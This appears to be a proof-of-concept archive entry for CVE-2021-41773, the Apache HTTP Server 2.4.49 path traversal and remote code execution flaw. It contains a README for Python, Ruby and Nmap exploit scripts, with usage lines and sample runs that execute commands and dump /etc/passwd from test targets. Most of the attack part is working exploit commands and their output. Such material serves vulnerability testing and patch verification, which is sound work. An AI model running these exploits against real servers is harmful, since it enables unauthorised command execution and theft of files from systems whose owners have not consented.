Associated Vulnerability
Title:Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)Description:A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
Description
These Metasploit, Nmap, Python and Ruby scripts detects and exploits CVE-2021-41773 with RCE and local file disclosure.
Readme
# CVE-2021-41773
## Description
This script exploits CVE-2021-41773 to print file or/and execute command.
This script is available for:
- Nmap
- Python
- Ruby
## Requirements
### Python
- python3
- python3 Standard Library
### Ruby
- Ruby
- Ruby Standard Library
### Install
```bash
git clone https://github.com/mauricelambert/CVE-2021-41773.git
cd CVE-2021-41773
# Python
pip install -r requirements.txt
```
### Usages
```bash
# Python
python3 CVE202141773.py [(-f/--file FILE|-c/--commands COMMAND1 COMMAND2 ...) -s/--ssl -o/--output FILE target]
# Nmap
nmap -p 80 --script RCE_CVE2021_41773 [--script-args "file=<file>" "command=<command>"] <target>
# Ruby
ruby CVE-2021-41773.rb [(-f/--file FILE|-c/--commands "COMMAND1;COMMAND2;...") -o/--output FILE target]
```
## Examples
### Python
```text
~# python3 CVE202141773.py 127.0.0.1:80
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[-] Target is not vulnerable.
~# python3 CVE202141773.py 127.0.0.1:8080
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
~# python3 CVE202141773.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 127.0.0.1:8080
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
H4CK
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202141773.py -f "/etc/passwd" -o out.txt 127.0.0.1:8080
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
~# cat out.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202141773.py -u "error" -f "/do/not/exists" 172.17.0.2
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 403).
~# python3 CVE202141773.py -f "/do/not/exists" 172.17.0.2
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 404).
~#
```
### Ruby
```text
~# ruby CVE-2021-41773.rb 127.0.0.1
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target: 127.0.0.1 is vulnerable
~# ruby CVE-2021-41773.rb -c "id; echo abc" 127.0.0.1
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
abc
~# ruby CVE-2021-41773.rb -f "/etc/passwd" -o abc.txt
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Host (target): 127.0.0.1
[+] Target is vulnerable.
~# cat abc.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~#
```
### Nmap
```text
~# nmap -p 80 --script RCE_CVE2021_41773 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:39 CET
NSE: Web service is up. Send payload...
NSE: Mode: detect only. No exploit.
NSE: Target is vulnerable.
Nmap scan report for 172.17.0.2
Host is up (0.00015s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_41773:
| CVE-2021-41773:
| title: Apache CVE-2021-41773 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-41773
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| year: 2021
| day: 29
| month: 09
| disclosure: 2021-09-29
| refs:
| https://nvd.nist.gov/vuln/detail/CVE-2021-41773
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
|_ https://github.com/mauricelambert/CVE-2021-41773
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
~# nmap -p 80 --script RCE_CVE2021_41773 --script-args "file=/etc/passwd" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:38 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit local file disclosure
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00017s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_41773:
| CVE-2021-41773:
| title: Apache CVE-2021-41773 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-41773
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| month: 09
| year: 2021
| day: 29
| disclosure: 2021-09-29
| refs:
| https://github.com/mauricelambert/CVE-2021-41773
| https://nvd.nist.gov/vuln/detail/CVE-2021-41773
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
| exploit output:
|
| root:x:0:0:root:/root:/bin/bash
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|_
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
~# nmap -p 80 --script RCE_CVE2021_41773 --script-args "command=id" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:32 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit RCE
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00087s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_41773:
| CVE-2021-41773:
| title: Apache CVE-2021-41773 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-41773
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| day: 29
| year: 2021
| month: 09
| disclosure: 2021-09-29
| refs:
| https://nvd.nist.gov/vuln/detail/CVE-2021-41773
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
| https://github.com/mauricelambert/CVE-2021-41773
| exploit output:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|_
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
~#
```
## Exit codes
- 0: Target is vulnerable
- 1: Target is not vulnerable
- 127: State unknown
## Links
- [nvd](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
- [Pydoc and examples](https://mauricelambert.github.io/info/python/security/CVE202141773.html)
- [Rdoc](https://mauricelambert.github.io/info/ruby/security/CVE-2021-41773/CVE202141773.html)
- [Payload and docker environment](https://github.com/blasty/CVE-2021-41773)
## Licence
Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
File Snapshot
[4.0K] /data/pocs/df5938a4e2880047d6f492846c2d4c15526bc4ee
├── [8.1K] apache_rce_cve2021_41773.md
├── [ 12K] apache_rce_cve2021_41773.rb
├── [8.8K] CVE202141773.py
├── [5.0K] CVE-2021-41773.rb
├── [ 35K] LICENSE.txt
├── [7.6K] RCE_CVE2021_41773.nse
├── [9.2K] README.md
└── [ 15] requirements.txt
0 directories, 8 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →